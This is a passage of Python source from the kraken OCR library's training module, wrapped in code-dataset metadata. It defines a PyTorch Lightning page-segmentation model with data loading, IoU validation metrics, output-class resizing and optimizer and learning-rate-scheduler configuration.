self.hparams.lrate\n\n def lr_scheduler_step(self, scheduler, optimizer_idx, metric):\n if not self.hparams.warmup or self.trainer.global_step >= self.hparams.warmup:\n # step OneCycleLR each batch if not in warmup phase\n if isinstance(scheduler, lr_scheduler.OneCycleLR):\n scheduler.step()\n # step every other scheduler epoch-wise\n elif self.trainer.is_last_batch:\n scheduler.step()\n\n\nclass SegmentationModel(pl.LightningModule):\n def __init__(self,\n hyper_params: Dict = None,\n load_hyper_parameters: bool = False,\n progress_callback: Callable[[str, int], Callable[[None], None]] = lambda string, length: lambda: None,\n message: Callable[[str], None] = lambda *args, **kwargs: None,\n output: str = 'model',\n spec: str = default_specs.SEGMENTATION_SPEC,\n model: Optional[Union[pathlib.Path, str]] = None,\n training_data: Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]] = None,\n evaluation_data: Optional[Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]]] = None,\n partition: Optional[float] = 0.9,\n num_workers: int = 1,\n force_binarization: bool = False,\n format_type: str = 'path',\n suppress_regions: bool = False,\n suppress_baselines: bool = False,\n valid_regions: 
Optional[Sequence[str]] = None,\n                 valid_baselines: Optional[Sequence[str]] = None,\n                 merge_regions: Optional[Dict[str, str]] = None,\n                 merge_baselines: Optional[Dict[str, str]] = None,\n                 bounding_regions: Optional[Sequence[str]] = None,\n                 resize: str = 'fail',\n                 topline: Union[bool, None] = False):\n        \"\"\"\n        A LightningModule encapsulating the training setup for a page\n        segmentation model.\n\n        Setup parameters (load, training_data, evaluation_data, ....) are\n        named, model hyperparameters (everything in\n        `kraken.lib.default_specs.SEGMENTATION_HYPER_PARAMS`) are in the\n        `hyper_params` argument.\n\n        Args:\n            hyper_params (dict): Hyperparameter dictionary containing all fields\n                                 from\n                                 kraken.lib.default_specs.SEGMENTATION_HYPER_PARAMS\n            **kwargs: Setup parameters, i.e. CLI parameters of the segtrain() command.\n        \"\"\"\n\n        super().__init__()\n\n        self.best_epoch = 0\n        self.best_metric = 0.0\n\n        self.model = model\n        self.num_workers = num_workers\n        self.resize = resize\n        self.format_type = format_type\n        self.output = output\n        self.bounding_regions = bounding_regions\n        self.topline = topline\n\n        hyper_params_ = default_specs.SEGMENTATION_HYPER_PARAMS\n\n        if model:\n            logger.info(f'Loading existing model from {model}')\n            self.nn = vgsl.TorchVGSLModel.load_model(model)\n\n            if self.nn.model_type not in [None, 'segmentation']:\n                raise ValueError(f'Model {model} is of type {self.nn.model_type} while `segmentation` is expected.')\n\n            if load_hyper_parameters:\n                hp = self.nn.hyper_params\n            else:\n                hp = {}\n            hyper_params_.update(hp)\n            batch, channels, height, width = self.nn.input\n        else:\n            self.nn = None\n\n        spec = spec.strip()\n        if spec[0] != '[' or spec[-1] != ']':\n            raise ValueError(f'VGSL spec \"{spec}\" not bracketed')\n        self.spec = spec\n        blocks = spec[1:-1].split(' ')\n        m = re.match(r'(\\d+),(\\d+),(\\d+),(\\d+)', blocks[0])\n        if not m:\n            raise ValueError(f'Invalid input spec {blocks[0]}')\n        batch, height, width, channels = [int(x) for x in m.groups()]\n\n        if hyper_params:\n            hyper_params_.update(hyper_params)\n\n        validate_hyper_parameters(hyper_params_)\n        self.save_hyperparameters(hyper_params_)\n\n        if not training_data:\n            raise ValueError('No training data provided. 
Please add some.')\n\n transforms = ImageInputTransforms(batch, height, width, channels, 0, valid_norm=False, force_binarization=force_binarization)\n\n self.example_input_array = torch.Tensor(batch,\n channels,\n height if height else 400,\n width if width else 300)\n\n # set multiprocessing tensor sharing strategy\n if 'file_system' in torch.multiprocessing.get_all_sharing_strategies():\n logger.debug('Setting multiprocessing tensor sharing strategy to file_system')\n torch.multiprocessing.set_sharing_strategy('file_system')\n\n if not valid_regions:\n valid_regions = None\n if not valid_baselines:\n valid_baselines = None\n\n if suppress_regions:\n valid_regions = []\n merge_regions = None\n if suppress_baselines:\n valid_baselines = []\n merge_baselines = None\n\n train_set = BaselineSet(training_data,\n line_width=self.hparams.line_width,\n im_transforms=transforms,\n mode=format_type,\n augmentation=self.hparams.augment,\n valid_baselines=valid_baselines,\n merge_baselines=merge_baselines,\n valid_regions=valid_regions,\n merge_regions=merge_regions)\n\n if format_type is None:\n for page in training_data:\n train_set.add(**page)\n\n if evaluation_data:\n val_set = BaselineSet(evaluation_data,\n line_width=self.hparams.line_width,\n im_transforms=transforms,\n mode=format_type,\n augmentation=False,\n valid_baselines=valid_baselines,\n merge_baselines=merge_baselines,\n valid_regions=valid_regions,\n merge_regions=merge_regions)\n\n if format_type is None:\n for page in evaluation_data:\n val_set.add(**page)\n\n train_set = Subset(train_set, range(len(train_set)))\n val_set = Subset(val_set, range(len(val_set)))\n else:\n train_len = int(len(train_set)*partition)\n val_len = len(train_set) - train_len\n logger.info(f'No explicit validation data provided. Splitting off '\n f'{val_len} (of {len(train_set)}) samples to validation '\n 'set.')\n train_set, val_set = random_split(train_set, (train_len, val_len))\n\n if len(train_set) == 0:\n raise ValueError('No valid training data provided. Please add some.')\n\n if len(val_set) == 0:\n raise ValueError('No valid validation data provided. 
Please add some.')\n\n        # overwrite class mapping in validation set\n        val_set.dataset.num_classes = train_set.dataset.num_classes\n        val_set.dataset.class_mapping = train_set.dataset.class_mapping\n\n        self.train_set = train_set\n        self.val_set = val_set\n\n    def forward(self, x):\n        return self.nn.nn(x)\n\n    def training_step(self, batch, batch_idx):\n        input, target = batch['image'], batch['target']\n        output, _ = self.nn.nn(input)\n        output = F.interpolate(output, size=(target.size(2), target.size(3)))\n        loss = self.nn.criterion(output, target)\n        return loss\n\n    def validation_step(self, batch, batch_idx):\n        x, y = batch['image'], batch['target']\n        pred, _ = self.nn.nn(x)\n        # scale target to output size\n        y = F.interpolate(y, size=(pred.size(2), pred.size(3))).squeeze(0).bool()\n        pred = pred.squeeze() > 0.3\n        pred = pred.view(pred.size(0), -1)\n        y = y.view(y.size(0), -1)\n\n        return {'intersections': (y & pred).sum(dim=1, dtype=torch.double),\n                'unions': (y | pred).sum(dim=1, dtype=torch.double),\n                'corrects': torch.eq(y, pred).sum(dim=1, dtype=torch.double),\n                'cls_cnt': y.sum(dim=1, dtype=torch.double),\n                'all_n': torch.tensor(y.size(1), dtype=torch.double, device=self.device)}\n\n    def validation_epoch_end(self, outputs):\n        smooth = torch.finfo(torch.float).eps\n\n        intersections = torch.stack([x['intersections'] for x in outputs]).sum()\n        unions = torch.stack([x['unions'] for x in outputs]).sum()\n        corrects = torch.stack([x['corrects'] for x in outputs]).sum()\n        cls_cnt = torch.stack([x['cls_cnt'] for x in outputs]).sum()\n        all_n = torch.stack([x['all_n'] for x in outputs]).sum()\n\n        # all_positives = tp + fp\n        # actual_positives = tp + fn\n        # true_positives = tp\n        pixel_accuracy = corrects.sum() / all_n.sum()\n        mean_accuracy = torch.mean(corrects / all_n)\n        iu = (intersections + smooth) / (unions + smooth)\n        mean_iu = torch.mean(iu)\n        freq_iu = torch.sum(cls_cnt / cls_cnt.sum() * iu)\n\n        if mean_iu > self.best_metric:\n            logger.debug(f'Updating best metric from {self.best_metric} ({self.best_epoch}) to {mean_iu} ({self.current_epoch})')\n            self.best_epoch = self.current_epoch\n            self.best_metric = mean_iu\n\n        logger.info(f'validation run: accuracy {pixel_accuracy} mean_acc {mean_accuracy} mean_iu {mean_iu} freq_iu {freq_iu}')\n        self.log_dict({'val_accuracy': pixel_accuracy,\n                       'val_mean_acc': mean_accuracy,\n                       'val_mean_iu': mean_iu,\n                       'val_freq_iu': freq_iu,\n                       'val_metric': mean_iu}, prog_bar=True)\n\n    def setup(self, stage: Optional[str] = None):\n        # finalize models in case of appending/loading\n        if stage in [None, 'fit']:\n            if not self.model:\n                self.spec = f'[{self.spec[1:-1]} O2l{self.train_set.dataset.num_classes}]'\n                logger.info(f'Creating model {self.spec} with {self.train_set.dataset.num_classes} outputs ', nl=False)\n                nn = vgsl.TorchVGSLModel(self.spec)\n                if self.bounding_regions is not None:\n                    nn.user_metadata['bounding_regions'] = self.bounding_regions\n                nn.user_metadata['topline'] = self.topline\n                self.nn = nn\n            else:\n                if self.train_set.dataset.class_mapping['baselines'].keys() != self.nn.user_metadata['class_mapping']['baselines'].keys() or \\\n                        self.train_set.dataset.class_mapping['regions'].keys() != self.nn.user_metadata['class_mapping']['regions'].keys():\n\n                    bl_diff = set(self.train_set.dataset.class_mapping['baselines'].keys()).symmetric_difference(\n                        set(self.nn.user_metadata['class_mapping']['baselines'].keys()))\n                    regions_diff = set(self.train_set.dataset.class_mapping['regions'].keys()).symmetric_difference(\n                        
set(self.nn.user_metadata['class_mapping']['regions'].keys()))\n\n if self.resize == 'fail':\n raise ValueError(f'Training data and model class mapping differ (bl: {bl_diff}, regions: {regions_diff}')\n elif self.resize == 'add':\n new_bls = self.train_set.dataset.class_mapping['baselines'].keys() - self.nn.user_metadata['class_mapping']['baselines'].keys()\n new_regions = self.train_set.dataset.class_mapping['regions'].keys() - self.nn.user_metadata['class_mapping']['regions'].keys()\n cls_idx = max(max(self.nn.user_metadata['class_mapping']['baselines'].values()) if self.nn.user_metadata['class_mapping']['baselines'] else -1,\n max(self.nn.user_metadata['class_mapping']['regions'].values()) if self.nn.user_metadata['class_mapping']['regions'] else -1)\n logger.info(f'Adding {len(new_bls) + len(new_regions)} missing types to network output layer.')\n self.nn.resize_output(cls_idx + len(new_bls) + len(new_regions) + 1)\n for c in new_bls:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['baselines'][c] = cls_idx\n for c in new_regions:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['regions'][c] = cls_idx\n elif self.resize == 'both':\n logger.info('Fitting network exactly to training set.')\n new_bls = self.train_set.dataset.class_mapping['baselines'].keys() - self.nn.user_metadata['class_mapping']['baselines'].keys()\n new_regions = self.train_set.dataset.class_mapping['regions'].keys() - self.nn.user_metadata['class_mapping']['regions'].keys()\n del_bls = self.nn.user_metadata['class_mapping']['baselines'].keys() - self.train_set.dataset.class_mapping['baselines'].keys()\n del_regions = self.nn.user_metadata['class_mapping']['regions'].keys() - self.train_set.dataset.class_mapping['regions'].keys()\n\n logger.info(f'Adding {len(new_bls) + len(new_regions)} missing '\n f'types and removing {len(del_bls) + len(del_regions)} to network output layer ')\n cls_idx = max(max(self.nn.user_metadata['class_mapping']['baselines'].values()) if self.nn.user_metadata['class_mapping']['baselines'] else -1,\n max(self.nn.user_metadata['class_mapping']['regions'].values()) if self.nn.user_metadata['class_mapping']['regions'] else -1)\n\n del_indices = [self.nn.user_metadata['class_mapping']['baselines'][x] for x in del_bls]\n del_indices.extend(self.nn.user_metadata['class_mapping']['regions'][x] for x in del_regions)\n self.nn.resize_output(cls_idx + len(new_bls) + len(new_regions) -\n len(del_bls) - len(del_regions) + 1, del_indices)\n\n # delete old baseline/region types\n cls_idx = min(min(self.nn.user_metadata['class_mapping']['baselines'].values()) if self.nn.user_metadata['class_mapping']['baselines'] else np.inf,\n min(self.nn.user_metadata['class_mapping']['regions'].values()) if self.nn.user_metadata['class_mapping']['regions'] else np.inf)\n\n bls = {}\n for k, v in sorted(self.nn.user_metadata['class_mapping']['baselines'].items(), key=lambda item: item[1]):\n if k not in del_bls:\n bls[k] = cls_idx\n cls_idx += 1\n\n regions = {}\n for k, v in sorted(self.nn.user_metadata['class_mapping']['regions'].items(), key=lambda item: item[1]):\n if k not in del_regions:\n regions[k] = cls_idx\n cls_idx += 1\n\n self.nn.user_metadata['class_mapping']['baselines'] = bls\n self.nn.user_metadata['class_mapping']['regions'] = regions\n\n # add new baseline/region types\n cls_idx -= 1\n for c in new_bls:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['baselines'][c] = cls_idx\n for c in new_regions:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['regions'][c] = cls_idx\n 
else:\n raise ValueError(f'invalid resize parameter value {self.resize}')\n # backfill train_set/val_set mapping if key-equal as the actual\n # numbering in the train_set might be different\n self.train_set.dataset.class_mapping = self.nn.user_metadata['class_mapping']\n self.val_set.dataset.class_mapping = self.nn.user_metadata['class_mapping']\n\n # updates model's hyper params with user-defined ones\n self.nn.hyper_params = self.hparams\n\n # change topline/baseline switch\n loc = {None: 'centerline',\n True: 'topline',\n False: 'baseline'}\n\n if 'topline' not in self.nn.user_metadata:\n logger.warning(f'Setting baseline location to {loc[self.topline]} from unset model.')\n elif self.nn.user_metadata['topline'] != self.topline:\n from_loc = loc[self.nn.user_metadata['topline']]\n logger.warning(f'Changing baseline location from {from_loc} to {loc[self.topline]}.')\n self.nn.user_metadata['topline'] = self.topline\n\n logger.info('Training line types:')\n for k, v in self.train_set.dataset.class_mapping['baselines'].items():\n logger.info(f' {k}\\t{v}\\t{self.train_set.dataset.class_stats[\"baselines\"][k]}')\n logger.info('Training region types:')\n for k, v in self.train_set.dataset.class_mapping['regions'].items():\n logger.info(f' {k}\\t{v}\\t{self.train_set.dataset.class_stats[\"regions\"][k]}')\n\n if len(self.train_set) == 0:\n raise ValueError('No valid training data was provided to the train command. Please add valid XML data.')\n\n # set model type metadata field and dump class_mapping\n self.nn.model_type = 'segmentation'\n self.nn.user_metadata['class_mapping'] = self.val_set.dataset.class_mapping\n\n # for model size/trainable parameter output\n self.net = self.nn.nn\n\n torch.set_num_threads(max(self.num_workers, 1))\n\n def train_dataloader(self):\n return DataLoader(self.train_set,\n batch_size=1,\n num_workers=self.num_workers,\n shuffle=True,\n pin_memory=True)\n\n def val_dataloader(self):\n return DataLoader(self.val_set,\n shuffle=False,\n batch_size=1,\n num_workers=self.num_workers,\n pin_memory=True)\n\n def configure_callbacks(self):\n callbacks = []\n if self.hparams.quit == 'early':\n callbacks.append(EarlyStopping(monitor='val_mean_iu',\n mode='max',\n patience=self.hparams.lag,\n stopping_threshold=1.0))\n\n return callbacks\n\n # configuration of optimizers and learning rate schedulers\n # --------------------------------------------------------\n #\n # All schedulers are created internally with a frequency of step to enable\n # batch-wise learning rate warmup. 
In lr_scheduler_step() calls to the\n # scheduler are then only performed at the end of the epoch.\n def configure_optimizers(self):\n return _configure_optimizer_and_lr_scheduler(self.hparams,\n self.nn.nn.parameters(),\n len_train_set=len(self.train_set),\n loss_tracking_mode='max')\n\n def optimizer_step(self, epoch, batch_idx, optimizer, optimizer_idx,\n optimizer_closure, on_tpu=False, using_native_amp=False,\n using_lbfgs=False):\n # update params\n optimizer.step(closure=optimizer_closure)\n\n # linear warmup between 0 and the initial learning rate `lrate` in `warmup`\n # steps.\n if self.hparams.warmup and self.trainer.global_step < self.hparams.warmup:\n lr_scale = min(1.0, float(self.trainer.global_step + 1) / self.hparams.warmup)\n for pg in optimizer.param_groups:\n pg[\"lr\"] = lr_scale * self.hparams.lrate\n\n def lr_scheduler_step(self, scheduler, optimizer_idx, metric):\n if not self.hparams.warmup or self.trainer.global_step >= self.hparams.warmup:\n # step OneCycleLR each batch if not in warmup phase\n if isinstance(scheduler, lr_scheduler.OneCycleLR):\n scheduler.step()\n # step every other scheduler epoch-wise\n elif self.trainer.is_last_batch:\n scheduler.step()\n\n\ndef _configure_optimizer_and_lr_scheduler(hparams, params, len_train_set=None, loss_tracking_mode='max'):\n # XXX: Warmup is not configured here because it needs to be manually done in optimizer_step()\n logger.debug(f'Constructing {hparams.optimizer} optimizer (lr: {hparams.lrate}, momentum: {hparams.momentum})')\n if hparams.optimizer == 'Adam':\n optim = torch.optim.Adam(params, lr=hparams.lrate, weight_decay=hparams.weight_decay)\n else:\n optim = getattr(torch.optim, hparams.optimizer)(params,\n lr=hparams.lrate,\n momentum=hparams.momentum,\n weight_decay=hparams.weight_decay)\n lr_sched = {}\n if hparams.schedule == 'exponential':\n lr_sched = {'scheduler': lr_scheduler.ExponentialLR(optim, hparams.gamma, last_epoch=hparams.completed_epochs-1),\n 'interval': 'step'}\n elif hparams.schedule == 'cosine':\n lr_sched = {'scheduler': lr_scheduler.CosineAnnealingLR(optim, hparams.gamma, last_epoch=hparams.completed_epochs-1),\n 'interval': 'step'}\n elif hparams.schedule == 'step':\n lr_sched = {'scheduler': lr_scheduler.StepLR(optim, hparams.step_size, hparams.gamma, last_epoch=hparams.completed_epochs-1),\n 'interval': 'step'}\n elif hparams.schedule == 'reduceonplateau':\n lr_sched = {'scheduler': lr_scheduler.ReduceLROnPlateau(optim,\n mode=loss_tracking_mode,\n factor=hparams.rop_factor,\n patience=hparams.rop_patience),\n 'interval': 'step'}\n elif hparams.schedule == '1cycle':\n if hparams.epochs <= 0:\n raise ValueError('1cycle learning rate scheduler selected but '\n 'number of epochs is less than 0 '\n f'({hparams.epochs}).')\n last_epoch = hparams.completed_epochs*len_train_set if hparams.completed_epochs else -1\n lr_sched = {'scheduler': lr_scheduler.OneCycleLR(optim,\n max_lr=hparams.lrate,\n epochs=hparams.epochs,\n steps_per_epoch=len_train_set,\n last_epoch=last_epoch),\n 'interval': 'step'}\n elif hparams.schedule != 'constant':\n raise ValueError(f'Unsupported learning rate scheduler {hparams.schedule}.')\n\n if lr_sched:\n lr_sched['monitor'] = 'val_metric'\n\n return [optim], lr_sched if lr_sched else []\n", "sub_path": "kraken/lib/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 50671, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 47, 
"usage_type": "call"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 55, "usage_type": "name"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 60, "usage_type": "attribute"}, {"api_name": "typing.Sequence", "line_number": 66, "usage_type": "name"}, {"api_name": "kraken.lib.progress.KrakenTrainProgressBar", "line_number": 81, "usage_type": "call"}, {"api_name": "kraken.lib.progress", "line_number": 81, "usage_type": "name"}, {"api_name": "pytorch_lightning.callbacks.RichModelSummary", "line_number": 86, "usage_type": "call"}, {"api_name": "warnings.catch_warnings", "line_number": 94, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 95, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks.Callback", "line_number": 100, "usage_type": "name"}, {"api_name": "pytorch_lightning.callbacks.Callback", "line_number": 116, "usage_type": "name"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 131, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 137, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 137, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 139, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 140, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 148, "usage_type": "name"}, {"api_name": "kraken.lib.default_specs.RECOGNITION_SPEC", "line_number": 135, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 135, "usage_type": "name"}, {"api_name": "kraken.lib.default_specs.RECOGNITION_HYPER_PARAMS", "line_number": 166, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 166, "usage_type": "name"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel.load_model", "line_number": 169, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 169, "usage_type": "attribute"}, {"api_name": "kraken.lib.vgsl", "line_number": 169, "usage_type": "name"}, {"api_name": "kraken.lib.dataset.GroundTruthDataset", "line_number": 197, "usage_type": "name"}, {"api_name": "kraken.lib.xml.preparse_xml_data", "line_number": 201, "usage_type": "call"}, {"api_name": "kraken.lib.xml.preparse_xml_data", "line_number": 204, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.PolygonGTDataset", 
"line_number": 208, "usage_type": "name"}, {"api_name": "kraken.lib.dataset.ArrowIPCRecognitionDataset", "line_number": 211, "usage_type": "name"}, {"api_name": "kraken.lib.dataset.PolygonGTDataset", "line_number": 238, "usage_type": "name"}, {"api_name": "re.match", "line_number": 260, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.ImageInputTransforms", "line_number": 267, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 275, "usage_type": "call"}, {"api_name": "torch.multiprocessing.get_all_sharing_strategies", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 280, "usage_type": "attribute"}, {"api_name": "torch.multiprocessing.set_sharing_strategy", "line_number": 282, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 282, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Subset", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 288, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 293, "usage_type": "call"}, {"api_name": "torch.utils.data.random_split", "line_number": 302, "usage_type": "call"}, {"api_name": "kraken.lib.util.make_printable", "line_number": 321, "usage_type": "call"}, {"api_name": "kraken.lib.codec.PytorchCodec", "line_number": 328, "usage_type": "call"}, {"api_name": "kraken.lib.util.make_printable", "line_number": 330, "usage_type": "call"}, {"api_name": "torch.multiprocessing.Pool", "line_number": 351, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 352, "usage_type": "call"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 360, "usage_type": "name"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 386, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.compute_error", "line_number": 396, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 397, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 398, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 402, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 403, "usage_type": "call"}, {"api_name": "torch.finfo", "line_number": 404, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 404, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 412, "usage_type": "name"}, {"api_name": "kraken.lib.exceptions.KrakenEncodeException", "line_number": 433, "usage_type": "name"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 441, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 477, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl", "line_number": 477, "usage_type": "name"}, {"api_name": "kraken.lib.models.TorchSeqRecognizer", "line_number": 498, "usage_type": "call"}, {"api_name": "kraken.lib.models", "line_number": 498, "usage_type": "name"}, {"api_name": "torch.set_num_threads", "line_number": 501, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 504, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.collate_sequences", "line_number": 509, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 512, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.collate_sequences", "line_number": 517, "usage_type": "name"}, {"api_name": 
"pytorch_lightning.callbacks.EarlyStopping", "line_number": 522, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 556, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 556, "usage_type": "name"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 563, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 565, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 567, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 568, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 571, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 571, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 571, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 572, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 572, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 572, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 572, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 572, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 573, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 573, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 574, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 580, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 580, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 581, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 581, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 582, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 582, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 583, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 583, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 584, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 584, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 586, "usage_type": "name"}, {"api_name": "kraken.lib.default_specs.SEGMENTATION_SPEC", "line_number": 570, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 570, "usage_type": "name"}, {"api_name": "kraken.lib.default_specs.SEGMENTATION_HYPER_PARAMS", "line_number": 616, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 616, "usage_type": "name"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel.load_model", "line_number": 620, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 620, "usage_type": "attribute"}, {"api_name": "kraken.lib.vgsl", "line_number": 620, "usage_type": "name"}, {"api_name": "re.match", "line_number": 639, "usage_type": "call"}, {"api_name": "kraken.lib.models.validate_hyper_parameters", "line_number": 647, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.ImageInputTransforms", "line_number": 653, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 655, "usage_type": "call"}, {"api_name": 
"torch.multiprocessing.get_all_sharing_strategies", "line_number": 661, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 661, "usage_type": "attribute"}, {"api_name": "torch.multiprocessing.set_sharing_strategy", "line_number": 663, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 663, "usage_type": "attribute"}, {"api_name": "kraken.lib.dataset.BaselineSet", "line_number": 677, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.BaselineSet", "line_number": 692, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 706, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 707, "usage_type": "call"}, {"api_name": "torch.utils.data.random_split", "line_number": 714, "usage_type": "call"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 735, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 735, "usage_type": "name"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 743, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 743, "usage_type": "name"}, {"api_name": "torch.double", "line_number": 748, "usage_type": "attribute"}, {"api_name": "torch.double", "line_number": 749, "usage_type": "attribute"}, {"api_name": "torch.eq", "line_number": 750, "usage_type": "call"}, {"api_name": "torch.double", "line_number": 750, "usage_type": "attribute"}, {"api_name": "torch.double", "line_number": 751, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 752, "usage_type": "call"}, {"api_name": "torch.double", "line_number": 752, "usage_type": "attribute"}, {"api_name": "torch.finfo", "line_number": 755, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 755, "usage_type": "attribute"}, {"api_name": "torch.stack", "line_number": 757, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 758, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 759, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 760, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 761, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 767, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 769, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 770, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 784, "usage_type": "name"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 790, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl", "line_number": 790, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 837, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 838, "usage_type": "attribute"}, {"api_name": "torch.set_num_threads", "line_number": 902, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 905, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", 